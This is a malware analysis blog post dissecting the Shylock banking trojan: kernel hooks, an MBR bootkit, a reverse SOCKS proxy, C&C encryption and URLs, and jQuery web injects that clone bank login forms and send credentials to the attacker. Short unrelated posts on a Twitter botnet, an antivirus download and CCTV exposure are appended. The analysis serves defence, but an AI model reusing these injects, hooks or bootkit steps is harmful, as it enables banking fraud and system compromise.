hook_IRP_MJ_DEVICE_CONTROL = get_hook_IRP_MJ_DEVICE_CONTROL_nsiproxy;
goto replace_original_IRP; // get the hooked DeviceIoControl,
// and swap it with the original one
}

The +0x70 offset in the listing above is referencing MajorFunction[IRP_MJ_DEVICE_CONTROL] within the driver object.

Here is why:
the driver object structure is declared as:

#define IRP_MJ_MAXIMUM_FUNCTION         0x1b
..
typedef struct _DRIVER_OBJECT {
/* 2 */ CSHORT Type; // offset = 0x00
/* 2 */ CSHORT Size; // offset = 0x02
/* 4 */ PDEVICE_OBJECT DeviceObject; // offset = 0x04
/* 4 */ ULONG Flags; // offset = 0x08
/* 4 */ PVOID DriverStart; // offset = 0x0c
/* 4 */ ULONG DriverSize; // offset = 0x10
/* 4 */ PVOID DriverSection; // offset = 0x14
/* 4 */ PDRIVER_EXTENSION DriverExtension; // offset = 0x18
/* 4 */ UNICODE_STRING DriverName; // offset = 0x1c
/* 8 */ PUNICODE_STRING HardwareDatabase; // offset = 0x24
/* 4 */ PFAST_IO_DISPATCH FastIoDispatch; // offset = 0x28
/* 4 */ PDRIVER_INITIALIZE DriverInit; // offset = 0x2c
/* 4 */ PDRIVER_STARTIO DriverStartIo; // offset = 0x30
/* 4 */ PDRIVER_UNLOAD DriverUnload; // offset = 0x34
/* 4 */ PDRIVER_DISPATCH
MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1]; // offset = 0x38
} DRIVER_OBJECT;

Its MajorFunction list contains IRP_MJ_MAXIMUM_FUNCTION + 1 = 0x1c elements, and its offset in the structure is 0x38. To find out what dispatch routine is references by the offset 0x70, the offset 0x70 needs to be subtracted with 0x38 (list's offset within the structure), and divided by 4 (size of each pointer within the list):

(0x70 - 0x38) / 4 = 0x0e

The 15th (0x0e) element of the dispatch routines is declared as:

#define IRP_MJ_DEVICE_CONTROL 0x0e

Knowing that, the source code of the Shylock driver can be reconstructed into a meaningful format, that can now be searched online to see where the Shylock authors may have stolen that code from. Why stolen? Given the complexity of this code on one hand, and the ROI (return-on-investment) principle on the other, malware products like Shylock often result from integration of the solutions that are already available on the 'market'. In the end of the day, it's much easier for them to find a code snippet online, and then plug into the malware.

Shylock driver is not different - here is the snippet of code that they have 'borrowed'. By having access to the same source, we can compile and debug the very same code, only now having the privilege of stepping through the code with the help of a tool VisualDDK, and seeing exactly how Shylock driver places its hooks and how those hooks affect netstat.

Below is a screenshot of the driver code in action. At the breakpoint seen below, the code is replacing the N-th TCP entry with the TCP entry N+1 (TcpEntry[i] <- data-blogger-escaped-code="">TcpEntry[i+1]):



The local entry's port number in our example is 139 (or 0x8B00 after applying htons() to it). As a result, any connections that involve port 139 disappear from the netstat output:



Apart from the IRP hooks placed by Shylock driver onto IRP_MJ_DEVICE_CONTROL dispatch routines of Tcp and Nsi Proxy drivers, it also hooks System Service Descriptor Table (SSDT). The functions it hooks are:
  • ZwEnumerateKey
  • ZwEnumerateValueKey
  • ZwQuerySystemInformation
  • ZwQueryDirectoryFile
  • ZwAllocateVirtualMemory
The KeServiceDescriptorTable patching is surrounded with a conventional cli/sti blocks: the cli-block disables interrupts and removes the write protection, the sti-block restores everything back:

.text:000130AC   cli                     ; disable interrupts
.text:000130AD mov eax, cr0 ; get CR0
.text:000130B0 and eax, 0FFFEFFFFh ; reset Write Protect flag, when clear,
; allows supervisor-level procedures
; to write into read-only pages
.text:000130B5 mov cr0, eax ; save it back into CR0

.text:000130B8 mov eax, KeServiceDescriptorTable
.text:000130BD mov eax, [eax]
.text:000130BF mov dword ptr [ecx+eax], offset hook_ZwEnumerateKey
.text:000130C6 mov eax, KeServiceDescriptorTable
.text:000130CB mov eax, [eax]
.text:000130CD mov ecx, [ebp+var_14]
.text:000130D0 mov dword ptr [edx+eax], offset hook_ZwEnumerateValueKey
.text:000130D7 mov eax, KeServiceDescriptorTable
.text:000130DC mov eax, [eax]
.text:000130DE mov dword ptr [esi+eax], offset hook_ZwQuerySystemInformation
.text:000130E5 mov eax, KeServiceDescriptorTable
.text:000130EA mov eax, [eax]
.text:000130EC mov dword ptr [ecx+eax], offset hook_ZwQueryDirectoryFile

.text:000130F3 mov eax, cr0 ; get CR0 (with the cleared WP flag)
.text:000130F6 or eax, offset _10000H ; set Write Protect flag to prevent
; writing into read-only pages;
.text:000130FB mov cr0, eax ; save it back into CR0
.text:000130FE sti ; allow interrupts

The hook_ZwQuerySystemInformation is handling those ZwQuerySystemInformation() calls that query for SystemProcessInformation type of system information, and is basically a rip-off of Greg Hoglund's process hider.

Skype Replicator

The Skype replicator component of Shylock relies on Skype Control API that uses window messages for communication with Skype.

First, it broadcasts SkypeControlAPIDiscover message to find the Skype window handle. If Skype is running, it will respond with SkypeControlAPIAttach message.

Next, Shylock starts controlling Skype via Control API by sending it window messages. When Skype handles the communication request coming from Shylock, it asks the user if the application in question should be allowed access to Skype or not. Shylock locates the window within Skype application that contains 2 horizontal buttons - first button is Allow, second is Deny. Next, it will attempt to send a click to the Allow button in order to trick Skype into accepting it as a client:



As soon as the click is submitted, the client is accepted, as demonstrated with the debugged code below:



Once Shylocks tricks Skype into accepting it as a client, it starts sending out messages to the contacts found in Skype. Any messages that Skype sends are stored in Skype's main.db file, which is a standard SQLite database. Shylock accesses this database and deletes its messages and file transfers so that the user could not find them in the history.

Shylock also tries to switch off sound alert settings within Skype by sending 'clicks' to its option window so that all the communications it initiates are carried out silently, without drawing any attention from the end user.

The Skype component of Shylock communicates with the remote server by submitting it installation details of Skype and fetching the configuration data for its own functionality.

BackSocks

BackSocks component of Shylock is a fully functional reverse (backconnect) SOCKS proxy server that is based on the source code of a legitimate proxy server 3Proxy, developed by 3APA3A ('zaraza', or 'contagion").

The SOCKS proxy allows the external attackers to tunnel their traffic through the compromised PC into internal (corporate) network. The connection with the proxy server is not established in a classic way where a backdoor trojan opens up a port and accepts incoming connections from the remote attacker - these schemes no longer work due to the wide adoption of NAT/firewalls. Instead, the SOCKS proxy initiates the reverse connection to the remote server (back-connects to it), and once that connection is established, the proxy server starts tunneling the traffic into internal network, as if the external attacker was physically located within the internal network.

By having access to the internal network through the SOCKS proxy, Shylock may access internal resources such as mail server, source control server, domain controllers etc.



Ability to hide from netstat any TCP connections held by the proxy with the remote attacker allows avoiding early detection of anomalies by network administrators.

Bootkit

In order to install the driver, Shylock engages a bootkit module that relies on an infection of the Master Boot Record (MBR). The bootkit module is a PE-executable that is protected with a run-time packer.

When run, the bootkit executable first checks if the following files can be open, and if not (e.g. these files do not exist), it continues:
  • C:\GRLDR
  • C:\XELDZ
The bootkit can be started from the following start-up registry entry:

FlashPlayerUpdate = %PATH_TO_BOOTKIT%
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce


Next, it enumerates first 8 physical drives (#0 - #7) connected to the local computer, starting from the driver #0:
\\.\PhysicalDrive0

For every drive, it invokes the MBR infection routine. The routine starts from reading the drive geometry parameters with DeviceIoControl(IOCTL_DISK_GET_DRIVE_GEOMETRY).

Next, it reads the first 512 bytes from the sector #0 (MBR), and then checks if its last 2 bytes are 55AA - a signature that identifies a bootable drive.

If the drive is not bootable, it is skipped:

.text:004024E9   xor     ebx, ebx        ; EBX is 0
...
.text:0040255E push ebx ; dwMoveMethod = 0
.text:0040255F push ebx ; lpDistanceToMoveHigh = 0
.text:00402560 push ebx ; lDistanceToMove = 0
.text:00402561 push edi ; hFile
.text:00402562 call ds:SetFilePointer ; set pointer at offset 0
.text:00402568 push ebx ; lpOverlapped
.text:00402569 lea eax, [ebp+NumberOfBytesRead]
.text:0040256C push eax ; lpNumberOfBytesRead
.text:0040256D push 512 ; nNumberOfBytesToRead
.text:00402572 lea eax, [ebp+Buffer]
.text:00402578 push eax ; lpBuffer
.text:00402579 push edi ; hFile
.text:0040257A call ds:ReadFile ; read 512 bytes
.text:00402580 call esi ; GetLastError
.text:00402582 test eax, eax
.text:00402584 jnz next_drive ; if error, skip it
.text:0040258A mov eax, 0AA55h ; compare last 2 bytes
.text:0040258F cmp [ebp+_510], ax ; (512-2) with 55AA-signature
.text:00402596 jnz short close_handle_next_drive

If the drive is bootable, the bootkit will encrypt the original MBR copy with a random XOR key, and then, it will save the encrypted MBR copy into the sector #57.

The bootkit stores its components in the 4 sectors: #58, #59, #60, #61, and also a number of sectors closer to the end of the physical drive (at a distance of around 17K-18K sectors before the end).

Once it writes all the sectors, it tries to delete itself by running the following command with the command line interpreter:
/c ping -n 2 127.0.0.1 & del /q "%PATH_TO_BOOTKIT%" >> nul

The ping-command with -n switch is used here as a method for the command line interpreter to wait for 2 seconds before it attempts to delete the bootkit executable.

Master Boot Record (MBR)

The MBR is infected with a code that is similar to other bootkits such as Mebroot or eEye BootRoot.

MBR code performs the following actions:

First, it reads 4 sectors: #58, #59, #60, #61 into the memory at 0x7E00 that immediately follows the MBR code loaded at address 0x7c00. Next, it allocates a new area of memory and reads there 5 sectors (512 bytes each, 2,560 bytes in total) starting from the loaded MBR code, and following with the 4 sectors that it just read. It then passes control into the code copied into the newly allocated area.

The new memory area has address 0x9E000, that is formed as segment register * 16 + offset of 0:
0x9E00 << 4 + 0 = 0x9E000.

Next, the code locates the XOR key that is stored at the offset 0x5c. The key is random, and it's implanted by the bootkit. The infected MBR code will then read the contents of the sector #57 into MBR, and use the same XOR key to decrypt it, thus fully restoring the original MBR in the sector #0.

Still running in the newly allocated area, the code will then restore remaining bytes from its own offset 0x10D till 0x18F, by applying the same XOR key. Once restored, these bytes turn out to be a hook handler code for the interrupt (INT) #13h - this interrupt is used to read sectors.

Once the INT 13h hook handler is decoded, the original INT 13h vector is replaced with the vector of the decoded one, and after that, the code jumps back into the original, fully restored MBR in sector 0:

MEM:9E0F0   mov   eax, dword ptr ds:offset_4c ; 4Ch = 13h * 4
MEM:9E0F4 mov dword ptr es:INT13HANDLER, eax ; save into JMP instr below
MEM:9E0F9 mov word ptr ds:offset_4c, offset Int13Hook ; place the hook
MEM:9E0FF mov word ptr ds:offset_4e, es
MEM:9E103 sti
MEM:9E104 popad
MEM:9E106 pop ds
MEM:9E107 pop sp
MEM:9E108 jmp start ; just to BOOTORG (0000h:7C00h)

With the INT 13h replaced, the original vector stored at ds:offset_4c will now contain 9E10D - the address of the INT 13h hook handler within the allocated conventional memory. As the control is passed back into original MBR, the system will start booting normally and the hooked INT 13h call will eventually be invoked by MBR code - this is when the hook handler will be activated.

The INT 13H hook handler is interested in 2 types of INT 13 - normal sector read and an extended one used with the larger disks, as shown below:

MEM:9E10D Int13Hook proc far
MEM:9E10D pushf ; handle two types of INT 13 below:
MEM:9E10E cmp ah, 42h ; 'B' ; 1) IBM/MS INT 13 Extensions - EXTENDED READ
MEM:9E111 jz short Int13Hook_ReadRequest
MEM:9E113 cmp ah, 2 ; 2) DISK - READ SECTOR(S) INTO MEMORY
MEM:9E116 jz short Int13Hook_ReadRequest
MEM:9E118 popf
MEM:9E119
MEM:9E119 [jmp opcode, followed with the original INT 13 vector]
MEM:9E11A INT13HANDLER db 4 dup(0) ; original vector is stored here
MEM:9E11E
MEM:9E11E Int13Hook_ReadRequest:
MEM:9E11E mov byte ptr cs:INT13LASTFUNCTION, ah
MEM:9E123 popf
MEM:9E124 pushf ; push Flags, simulating INT
MEM:9E125 call dword ptr cs:INT13HANDLER ; call original handler
MEM:9E12A jb short Int13Hook_ret ; quit if failed
MEM:9E12C pushf
MEM:9E12D cli
MEM:9E12E push es
MEM:9E12F pusha
MEM:9E130 [mov ah, ??] opcode - operand is patched at MEM:9E11E
MEM:9E131 INT13LASTFUNCTION:
MEM:9E131 [mov ah, ??] operand, 0 by default
MEM:9E132 cmp ah, 42h ; 'B' ; IBM/MS INT 13 Extensions - EXTENDED READ
MEM:9E135 jnz short Int13Hook_notextread
MEM:9E137 lodsw
MEM:9E138 lodsw
MEM:9E139 les bx, [si]
MEM:9E13B assume es:nothing

The handler then scans and patches the code of OSLOADER module (part of NTLDR) - the patched code is invoked during the system partition reading during Windows start-up. OSLOADER is executed in protected mode, and by patching it, Shylock will force it to execute the payload loader code in protected mode as well.

To patch it in the right place, the scanner is looking for bytes F0 85 F6 74 21 80, as shown below:

MEM:9E149 Int13Hook_scan_loop:
MEM:9E149 repne scasb
MEM:9E14B jnz short Int13Hook_scan_done
MEM:9E14D cmp dword ptr es:[di], 74F685F0h ; F0 85 F6 74
MEM:9E155 jnz short Int13Hook_scan_loop
MEM:9E157 cmp word ptr es:[di+4], 8021h ; 21 80
MEM:9E15D jnz short Int13Hook_scan_loop

These bytes correspond to the following code of the original loader:

.text:00422A6A E8 C2 12 00 00             call    near ptr unk_47DE1
.text:00422A6F 8B F0 mov esi, eax
.text:00422A71 85 F6 test esi, esi
.text:00422A73 74 21 jz short loc_46B46
.text:00422A75 80 3D F8 AE 43 00 00 cmp byte_43AEF8, 0

Once these bytes are found within OSLOADER, the kernel patch from the sector #58 is applied to the loader, by directly overwriting its bytes:



The patched loader code may now look like this (compare to the original loader code above):

.text:00422A6A E8 C2 12 00 00         call    near ptr unk_47DE1
.text:00422A6F B8 33 E2 09 00 mov eax, offset off_9E233
.text:00422A74 FF D0 call eax ; off_9E233
.text:00422A76 90 nop
.text:00422A77 90 nop
.text:00422A78 90 nop
.text:00422A79 90 nop
.text:00422A7A 90 nop
.text:00422A7B 90 nop
.text:00422A7C 90 nop
.....

The address off_9E233 points to the code loaded from the sectors #58-#61, and corresponds to the Kernel Patcher shellcode. Once it gets control within OSLOADER, it is executed in protected mode and starts invoking the consequent stages of the bootkit execution that lead to the eventual driver installation.

Main Shylock Module

Main Shylock module is an executable that injects its code into other processes, communicates with C&C and fetches configuration files and plug-ins, fully monitors browsers Internet Explorer and Firefox, and provides full backdoor access to the compromised system. It is the remote configuration files that define its logic, such as what online banking sessions to intercept and how.

Shylock is a VM-aware threat: its anti-sandboxing code enumerates all the drivers installed on a compromised system, and for every driver it calculates a hash of its name; if the returned name hash is black-listed, Shylock will exit.

For example, on a snapshot below, Shylock returns a hash of 0x2FE483F3 for an enumerated driver vmscsi.sys (part of VMWare). The code explicitly checks the hash against a hard-coded value of 0x2FE483F3, and in case of a match, it quits.



In order to complicate code analysis and emulation, Shylock always calls APIs by their hashes. For instance, GetCommandLineA() is called with a stand-alone stub with a hard-coded API hash of 0xC66A1D2E:



The API hash calculation algorithm is trivial:

DWORD GetHash(char *szApi)
{
DWORD dwHash = 0;
for (DWORD i = 0; i < strlen(szApi); i++)
{
BYTE b = szApi[i];
dwHash ^= b;
__asm
{
ror dwHash, 3
}
if (b == 0)
{
break;
}
}
return dwHash;
}

Shylock spawns separate threads for different plugins. For example, it injects BackSocks server DLL into svchost.exe and starts a remote thread in it.

The trojan checks the host process name, and depending on the name, it installs different user-mode hooks for the process.

If the host process is FireFox browser (FIREFOX.EXE), it will load nss3.dll and nspr4.dll. Next, it will place these hooks:

nspr4.dll:
  • PR_Read

  • PR_Write

  • PR_Close

nss3.dll:
  • CERT_VerifyCertName

  • CERT_VerifyCertNow

If the host process Internet Explorer (IEXPLORE.EXE), it will load mshtml.dll and then place following hooks:

ws2_32.dll:
  • send

wininet.dll:
  • HttpOpenRequestA/W

  • HttpSendRequestA/W

  • HttpSendRequestExA/W

  • InternetReadFile

  • InternetReadFileExA/W

  • InternetCloseHandle

  • InternetQueryDataAvailable

  • InternetSetStatusCallback

In case the host process is Windows Explorer (EXPLORER.EXE) or system processes USERINIT.EXE or RUNDLL32.EXE, then it will hook:

ntdll.dll:
  • NtCreateThread/ZwCreateThread

  • NtCreateUserProcess/ZwCreateUserProcess

  • NtEnumerateValueKey/ZwEnumerateValueKey

  • NtQueryDirectoryFile/ZwQueryDirectoryFile

user32.dll:
  • ExitWindowsEx

  • GetMessageW

kernel32.dll:
  • HeapDestroy

advapi32.dll:
  • InitiateSystemShutdownExW

The purpose of the hooks above is to inject into newly launched processes and to hide its file/registry entries. If the user shuts down Windows, the hook handler will attempt to recreate the files and the start-up registry entries, in order to persist even the user has partially deleted this threat.

Once activated, Shylock deletes all Firefox cookies. Next, it searches for and overwrites user.js files found in %APPDATA%\Mozilla\Firefox\Profiles directory, thus manipulating the following security settings of the Firefox browser:

security.enable_tls = false
network.http.accept-encoding = ""
secnetwork.http.accept-encodingurity.warn_viewing_mixed = false
security.warn_viewing_mixed.show_once = false
security.warn_submit_insecure = false
security.warn_submit_insecure.show_once = false


For example, whenever insecure form information is submitted, the "Security Warning" dialogue will not be displayed by Firefox - this will allow Shylock to have no objections from the browser when it tries to work with fake/redirected sites.

It can also delete and upload Flash Player cookies (Local Shared Object - SOL files) stored in %APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys directory. Flash cookies are persistent to traditional cookies removal by the end user, as they are not controlled through the cookie privacy controls in a browser.

Internally, Shylock distinguishes itself running in one of 3 modes:
  • master

  • slave

  • plugin

The 'master' is responsible for communication with the remote server, namely sending 'beacon' signals to the server, posting detailed computer information, reports/files, posting error logs, and polling the remote C&C server for configuration files on injection/redirection and other execution parameters. The 'master' may spawn a thread that will record the video of everything that occurs on the screen, and then upload the video to the remote server. In order to 'talk' to the 'slaves' and 'plugins', that are injected into other running processes, the 'master' uses Interprocess Communication Mechanism (IPC) via a named memory pipe that allows sharing data across all Shylock components running within the different processes.

Shylock executable has a dedicated configuration stub in its image that is similar to ZeuS. For example, the C&C URLs and injections configuration file name are hard-coded in that stub as:
  • https://wguards.cc/ping.html

  • https://hiprotections.su/ping.html

  • https://iprotections.su/ping.html

  • /files/hidden7770777.jpg

The usage of a stub suggests that Shylock executable is most likely compiled once with an empty stub, and then is dynamically 'patched' by a builder to embed different C&C URLs in it, with the string encryption routine being part of the builder.

One of the configuration stub fields contains a timestamp of the date and time when the executable was generated. Shylock makes an attempt to avoid execution if current time is past the compilation time by more than 2 hours. But either due to a bug or a 'feature', the 2-hour time span ignores months, so it will run on a same day of every month of the same year, but only within the 2-hour 'window'. If Shylock is executed outside that window, it will quit. The 2-hour span means that Shylock allows only 'fresh' installations/executions of itself, when the C&C embedded into executable are live, or otherwise, it is risking to be exposed by constantly pinging non-existent (or taken down) domains, ringing all the bells within intrusion/anomaly detection systems.

All strings are encrypted with a random key that is stored together with an encrypted string. The key is saved into 4 bytes, is followed by 4 zero-bytes, and then followed with the encrypted data. The code decrypts the strings on-the-fly: first, it makes an integrity check by applying the key to the encrypted data and making sure the original string has at least 2 characters in it. Next, it decrypts the string itself.

The reconstructed string checker and decryptor would look like:

int iGetEncodedStringLen(DWORD dwKey, char *szString)
{
int iResult;
int iCount;

if (szString)
{
iCount = 0;
if ((BYTE)dwKey ^ *(LPBYTE)szString)
{
do
{
++iCount;
dwKey = (845 * dwKey + 577) % 0xFFFFFFFF;
}
while ((BYTE)dwKey != *(LPBYTE)(iCount + szString));
}
iResult = iCount;
}
else
{
iResult = 0;
}
return iResult;
}

void DecodeString(void *szEncrypted, unsigned int dwKey, int iFlag)
{
char b1;
char b2;
bool bEndOfString;

if (szEncrypted)
{
while (1)
{
b1 = *(LPBYTE)szEncrypted;
b2 = dwKey ^ *(LPBYTE)szEncrypted;
*(LPBYTE)szEncrypted = b2;
if (iFlag == 1)
{
bEndOfString = b2 == 0;
}
else
{
if (iFlag)
{
goto skip_check;
}
bEndOfString = b1 == 0;
}
if (bEndOfString)
{
return;
}
skip_check:
szEncrypted = (char *)szEncrypted + 1;
dwKey = (845 * dwKey + 577) % 0xFFFFFFFF;
}
}
}

so that the encrypted C&C URL below:

char szTest[] = "\xE7\xEB\xBB\x91"             // key
"\x00\x00\x00\x00" // 4 zeroes
"\x8F\xC8\xB9\x9A\xD0\x72\xC6\x79\x68\xF3"
"\xB0\xE3\x29\xC4\x12\x40\x34\x0F\x92\x6A"
"\x7A\x96\xBE\xA8\xE7\x30\xD8\xDE\xCB";

can now be decrypted as:

if (iGetEncodedStringLen(*(DWORD*)szTest, szTest + 8) > 0)
{
DecodeString(szTest + 8, *(DWORD*)szTest, 1);
MessageBoxA(NULL, szTest + 8, NULL, MB_OK);
}



A stand-alone tool that relies on such decryptor allows decrypting and patching all 751 strings within the Shylock executable to further facilitate its static analysis.

When Shylock communicates with the remote C&C server, it relies on HTTPS. Apart from that, the transferred data is encrypted with RC4 algorithm. Shylock takes one of C&C server URLs stored in its configuration stub, and prepends it with a random string, delimited with a dot. For example, wguards.cc becomes ei0nciwerq7q8.wguards.cc.

The modified domain name will successfully resolve and will be used for communications. The same domain name will then be used to form an encryption key - Shylock appends a hard-coded string 'ca5f2abe' to the modified domain name, and then uses that string as a seed to generate a 256-byte RC4 key. The new RC4 key is then used to encrypt the transferred data. Once encrypted, the data is base-64 encoded, URL-escaped, and passed as a request to the C&C server within a z= URL parameter in it, e.g.:

http://ei0nciwerq7q8.wguards.cc/ping.html?z=[encrypted_data]

where [encrypted_data] is a result of:

url_escape(base64_encode(RC_encrypt(url_escape(text_log), "ei0nciwerq7q8.wguards.ccca5f2abe")))

The C&C server thus reads z= parameter contents, url-unescapes it, base64-decodes it, then RC4-decrypts it by using the server's own name with 'ca5f2abe' string appended and used as a password, then url-unescapes the resulting data which is a plain text.

By taking the source code of the functions rc4_init() and rc4_crypt(), published earlier in this post, and then calling them with the modified domain name used as RC4 'password', Shylock traffic can now be fully decrypted, as demonstrated below:



As seen on a picture, the posted 'cmpinfo' data is accompanied with a control sum and a hash to ensure data integrity ('key' and 'id'), it shows an installation mode ('master'), botnet name ('net2'), command name ('log'). The data includes system snapshot log that enlists running processes, installed applications, programs registered to run at startup, HDD/CPU system info, and many other details about the compromised OS. Shylock also recognises and reports all major antivirus/firewall products by querying a long list of process names and registry entries.

The executable drops its own copy as a temp file, registers itself in a start-up registry key, then injects into svchost.exe and explorer.exe and runs a self-termination batch script, thus quitting its 'installation' phase of running.

When Shylock requests configuration data from the server, it uses a 'cmd' (command) parameter set to 'cfg' (configuration).

Let's manually construct a request 'net=net2&cmd=cfg', then feed it to the debugged code to calculate the 'key' and 'id' parameters for us. The resulting request will be:

key=a323e7d52d&id=47E8ABF258AB82ECEF14F79B37177391&inst=master&net=net2&cmd=cfg

The C&C we'll use will be https://y85rqmnuemzxu5z.iprotections.su/ping.html, so let's encrypt it with the RC4 key of 'y85rqmnuemzxu5z.iprotections.suca5f2abe', and then base64-encode it. The server will reply with the base64-encoded text to such request, transferred via HTTPS:



Once this response is base64-decoded, it needs to be decrypted. The key used to encrypt this data is not the same as before. It is an 'id' value that was passed inside the request to the server, i.e. '47E8ABF258AB82ECEF14F79B37177391' in our example above. By using this value as RC4 'password', the server response can now be decrypted with the same tool as before. The decrypted file turns out to be an XML file with the configuration parameters in it:
<hijackcfg>
      <botnet name="net2"/>
      <timer_cfg success="1200" fail="1200"/>
      <timer_log success="600" fail="600"/>
      <timer_ping success="1200" fail="1200"/>
      <urls_server>
            <url_server url="https://protections.cc/ping.html"/>
            <url_server url="https://eprotections.su/ping.html"/>
            <url_server url="https://iprotections.su/ping.html"/>
      </urls_server>
      
... and so on

The XML enlists other plugin URLs, backconnect server IP and port number used by the reverse SOCKS proxy server connection for live VNC sessions, URL of the latest Shylock executable for an update. All the most important plugins contained in the configuration file were already explained before. The C&C list is refreshed with the new servers. The last remaining bit here is an 'httpinject' parameter specified as:
<httpinject value="on" url="/files/hidden7770777.jpg" md5="c2ffb650839873a332125e7823d36f9e"/>
It's the same name as the one specified in the executable stub along with 3 other C&C URLs, only now it's clear this file contains browser injection/redirection logic. So let's fetch this file by directly downloading it from C&C as a static file.

The downloaded file is compressed with zlib v1.2.3; once decompressed, it shows all web inject logic employed by Shylock.

Web Injects

The web injects of Shylock work by intercepting online banking sessions and injecting extra HTML data. Analysis of the configuration data suggests that Shylock attacks mostly UK banks.

There are several types of data that Shylock replaces on a web page. In one type, Shylock replaces the phone numbers provided at the bank's site. In the example below, the trojan modifies the bank's complaint form - an inset shows what the original form is replaced with:



In other cases, the web pages themselves are not modified - only the enlisted phone numbers are replaced.

Calling the replacement phone number leads to the following auto-reply message (actual audio recording):

Auto Reply Message

The injection of the phone numbers into the web sites are most likely designed to prevent resolution scenarios when customers receive a phishing email, or get concerned about the stolen funds or compromised accounts. In case of a security breach, the natural thing to do for many is to open the bank's website and look up the telephone numbers to call the bank and cancel the credit card, or lock other accounts. By accessing the bank site through the same compromised system, the issues that need to be addressed as quick as possible, might not be addressed when the time is critical.

Apart from the phone number replacements, online banking login forms are simply blocked from being displayed by settings their CSS style into:
style="display:none;"
In another scenario, the web inject contains JQuery script that detects the login form on a page, then clones it with JQuery's .clone() command:
var ombtrwcf756gsw = frm.clone(false).insertAfter(frm).show().attr('id', 'log-on-form');
The screenshot below shows the result of such cloning:



The original login form is then hidden from the user:
jQuery(this).hide();
Once the user fills out the cloned form with the login details and then presses its Login button, the entered details will populate the original form, that will then be submitted by clicking the original Login button, in order to allow the user to log on successfully:
jQuery('#usr_name').val(lvltxt.qqqrcs06tl9npo);
jQuery('#usr_password').val(lvltxt.pwd);
jQuery('.login-button:first').find('div').click();
At the same time, the fields of the cloned form will be posted to the attacker's server (cross-domain) in the background (with XDomainRequest()).

The injects that collect personal information use tricky social engineering tactics, referring to existing malware as a leverage to build trust to the compromised session:

Attention! Due recent new strains of malicious software such as Zeus and Spy Eye that have been targeting users of US Internet Banking website, we are forced to perform additional security checks on your computer.
We are now checking your system to make sure that your connection is secure. It allows us to ensure that your system is not infected.
Checking your settings frequently, allows you to keep your data intact. Keeping your Anti-Virus programs up to date is strongly recommended.
This process undergoes an additional layer of protection, identifying you as the authorised account user. Interrupting the test may lead to a delay in accessing your account online.
Checking browser settings...0%
Checking log files...
Checking encryption settings...


Another example:

A critical error has occurred. We could not recognize Your internet browser's security settings. This could be because You are using different web browser or different PC.
In order to confirm Your identify, we will send you a text message with one time password.
Below is the contact information we have on record for you that is eligible for the security check. If you have recently changed your contact information it may not be displayed.
Note: For security reasons, we have hidden parts of your contact information below with "xxx"


The injected scripts are relying on a powerful and modern script engine JQuery that allows Shylock to manipulate online banking sessions the way it needs to. The harvested credit card numbers are even queried against the remote attacker's site to undergo a validation. The scripts it injects rely on other scripts, dynamically downloaded from the malicious websites. That allows the attacker to manipulate Shylock logic by updating those scripts, without even touching the command-and-control servers.

Conclusion

What makes Shylock dangerous is that it's a classic 'Blended Threat' by definition: a combination of best-of-breed malware techniques that evolved over time:

  • Disk spreader, Skype spreader

  • Kernel-mode rootkit, Bootkit

  • VNC with Back-connect Proxy server

  • FTP credentials stealer

  • Banking Trojan

Its technology is out there, 'in the wild', all it takes now is to change the inject scripts to start targeting any other bank in the world. As it already happened before with ZeuS, it is now a matter of time before it starts targeting other banks' customers.


          Insidious Twitter Botnet is Streaming in Stealth Mode        

Recently, I became aware of a prodigious stealth-mode Twitter botnet that contain upwards of 3 million user accounts, alongside two other botnets that total 100,000 bots. Kudos goes to SadBotTrue security researchers who first disclosed botnet findings at their blog earlier this week. Stealth Twitter botnet According to SadBotTrue, this particular botnet is the most […]

The post Insidious Twitter Botnet is Streaming in Stealth Mode appeared first on TekSec.


          Norton Antivirüs 360 4.1.0.32 Download- Yükle        
Norton 360 All-sen tutar-bir koruma, aileniz, PC, ve bilgilerinizi güvenli sağlar. Bu kapsamlı çözüm birleştirir antivirüs, yeni otomatik yedekleme ve özellikler antiphishing ile sektörün önde gelen güvenlik ve PC ayarlama teknolojileri, koruma tam bir daire sağlar. Norton 360 ™ Version 3.0, teslim performansı kanıtlanmış sunar günümüzün en hızlı ve en hafif hepsi bir arada çözüm ve tüm online faaliyetleri PC'nizi korumak için. Bu virüslere karşı korur, solucan, hacker ve botnet'ler, ...
          CCTV exposed. Why understanding network security is so important.        

For those of you who are regulars on Geekzone you’ll know one of my pet peeves is people who don’t understand the huge security risk associated with port forwards. Configuring a port forward in your router or firewall is something configured by people every day, with the vast majority probably failing to consider the security risks of something that’s so easily done.

Opening up your network to allow traffic from anywhere on the Internet to directly access your PC or hardware behind your router and/or firewall removes an entire layer of security, and allows anybody on the Internet to directly access your PC or hardware on the port(s) that have been forwarded. If there are security exploits in either the software on your PC or the hardware it could easily compromise your entire network and your security.

If you’re running a VoIP setup and port forward port 5060 you’re opening your IP PBX or phone system up to what will be a never ending attack from bots and scripts trying to find holes your system for the purpose of routing illegitimate calls.  By setting up a port forward to CCTV equipment you run the risk of your security cameras being left wide open for anybody on the Internet to view for both entertainment and for possible malicious purposes.

In recent days we’re once again seen a mainstream media article on Stuff discussing compromised or poorly configured CCTV cameras in New Zealand that can be openly viewed by anybody on the Internet. While Stuff have chosen not to name where these cameras are linked from, the source is insecam.org, a site that proclaims itself as “the world biggest directory of online surveillance security cameras”. This story is very similar to another run in 2014 in the NZ Herald discussing the very same issue with cameras in New Zealand viewable on the insecam website.

cctv image 1

cctv image 3

While this site lists only lists openly viewable CCTV equipment, IoT search tool Shodan is the best resource on the Internet for discovering hardware devices (both CCTV and other) that are exposed to the Internet. Many of these devices are “compromised” because of one simple flaw – either configuring port forwards to allow remote access, or enabling UPnP allowing the devices to create their own port forwards for remote access. It’s worth pointing out here that the insecam website isn’t doing anything illegal – they’re simply aggregating content that’s all publically accessible.

If you’ve got CCTV cameras then it’s not an unrealistic requirement to want to view these remotely. Most systems these days offer web access and/or mobile apps allowing you to view your cameras from anywhere in the world, and many even pitch remote access as a key selling point. The simplest way to configure remote access is to set up a port forward allowing direct access to the camera itself, a Network Video Recorder (NVR) or a Digital Video recorder (DVR).

Some equipment may also be UPnP enabled to make this process even easier – if you have a router with UPnP capabilities and the UPnP functionality is enabled on both your router and the CCTV equipment you may have your CCTV equipment exposed to the Internet even without your knowledge. By having a port forward or UPnP enabled you’ve exposed your CCTV system to the entire Internet and it’s now as a secure as the hardware you’re using.. And that’s where the problems start.

